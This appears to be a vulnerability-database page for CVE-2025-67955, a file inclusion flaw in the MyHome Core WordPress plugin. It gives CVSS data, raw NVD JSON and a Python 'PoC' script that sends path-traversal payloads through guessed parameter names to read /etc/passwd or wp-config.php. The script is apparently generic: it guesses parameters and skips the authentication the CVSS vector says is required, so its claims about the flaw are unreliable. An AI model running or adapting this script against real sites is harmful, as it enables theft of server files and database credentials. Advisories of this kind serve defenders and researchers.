Security Vulnerability Report
中文
CVE-2025-67955 CVSS 7.5 HIGH

CVE-2025-67955

Published: 2026-01-22 17:16:05
Last Modified: 2026-04-27 18:16:51

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP MyHome Core myhome-core allows PHP Local File Inclusion.This issue affects MyHome Core: from n/a through <= 4.1.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MyHome Core <= 4.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67955 PoC - MyHome Core Local File Inclusion # Target: WordPress site with MyHome Core plugin <= 4.1.0 def test_lfi(target_url, filename='/etc/passwd'): """ Test for Local File Inclusion vulnerability in MyHome Core plugin Args: target_url: Base URL of the WordPress site filename: Path to file to read (default: /etc/passwd) Returns: Content of the file if vulnerable, None otherwise """ # Common vulnerable parameter patterns params = { 'template': f'../../../../{filename}', 'file': f'../../../../{filename}', 'page': f'../../../../{filename}', 'view': f'../../../../{filename}' } for param_name, payload in params.items(): try: response = requests.get( target_url, params={param_name: payload}, timeout=10, verify=False ) # Check if file content is returned if response.status_code == 200: # Basic check if it looks like file content if any(marker in response.text for marker in ['root:', 'daemon:', 'bin:', '<?php']): return response.text except requests.RequestException as e: print(f"Error testing {param_name}: {e}") return None def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-67955-poc.py <target_url> [file_path]") print("Example: python cve-2025-67955-poc.py http://example.com") print("Example: python cve-2025-67955-poc.py http://example.com wp-config.php") sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd' print(f"[*] Testing CVE-2025-67955 on {target}") print(f"[*] Attempting to read: {file_to_read}") result = test_lfi(target, file_to_read) if result: print("[+] Vulnerability confirmed!") print("[+] File content:") print(result[:500] + "..." if len(result) > 500 else result) else: print("[-] Target may not be vulnerable or file not accessible") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67955", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:05.033", "lastModified": "2026-04-27T18:16:51.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP MyHome Core myhome-core allows PHP Local File Inclusion.This issue affects MyHome Core: from n/a through <= 4.1.0."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP, una vulnerabilidad de 'inclusión remota de ficheros PHP' en TangibleWP MyHome Core myhome-core, permite la inclusión local de ficheros PHP. Este problema afecta a MyHome Core: desde n/a hasta &lt;= 4.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/myhome-core/vulnerability/wordpress-myhome-core-plugin-4-1-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}